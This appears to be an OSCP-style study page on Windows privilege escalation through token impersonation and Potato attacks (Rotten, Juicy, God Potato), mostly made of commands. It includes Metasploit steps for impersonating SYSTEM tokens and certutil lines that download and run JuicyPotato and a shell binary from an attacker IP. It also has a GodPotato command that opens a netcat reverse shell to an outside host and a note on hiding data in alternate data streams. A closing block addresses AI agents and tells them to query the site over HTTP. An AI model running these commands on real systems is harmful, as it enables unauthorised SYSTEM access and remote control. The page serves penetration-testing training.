# Impersonation and Potato Attacks

## Token Impersonation Overview

[Token impersonation explained](/active-directory/post-compromise-attacks/token-impersonation.md)

<figure><img src="/files/r4SUdQmiNd7LrF1XI4VA" alt=""><figcaption><p>HTB Machine Jeeves</p></figcaption></figure>

{% embed url="<https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop-impersonation-privileges>" %}

## Potato Attack Overview

<figure><img src="/files/kSOCeuSTpVJz0qPxv6FY" alt=""><figcaption><p>High level Overview from foxglovesecurity </p></figcaption></figure>

## Escalation via Potato Attack

After getting a **meterpreter** shell

```bash
background
use exploit/windows/local/ms16_075_reflection
set LHOST tun0
set LPORT 1738        <-- Something different from the first shell
exploit

```

Inside of new **meterpreter** shell

```bash
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
shell
whoami
```

## Manual Juicy Potato Attack

```
cd C:\Windows\System32\spool\drivers\color\
certutil.exe -urlcache -f http://10.9.209.91/JuicyPotato.exe juicy.exe
certutil.exe -urlcache -f http://10.9.209.91/shell.exe
juicy.exe -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} -l 1337 -p "C:\Windows\System32\spool\drivers\color\shell.exe"
```

#### GOD POTATO

```
godpotato.exe -cmd "cmd /c whoami"
```

`.\godpotato.exe -cmd "C:\programdata\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.214 1338"`

## Resources

{% embed url="<https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe>" %}

{% embed url="<https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/>" %}
Technical Overview
{% endembed %}

{% embed url="<https://github.com/ohpe/juicy-potato>" %}
Other Version
{% endembed %}

{% embed url="<https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato>" %}

## Bonus

### Alternate Data Streams

Alternate datastreams are a file attribute in NTFS only. Regular data stream is primary text inside of a file. Alternate is a way to hide informtion inside of a file

```
dir /r
more hm.txt:root.txt:$DATA
```

{% embed url="<https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://oscp.adot8.com/windows-privilege-escalation/impersonation-and-potato-attacks.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.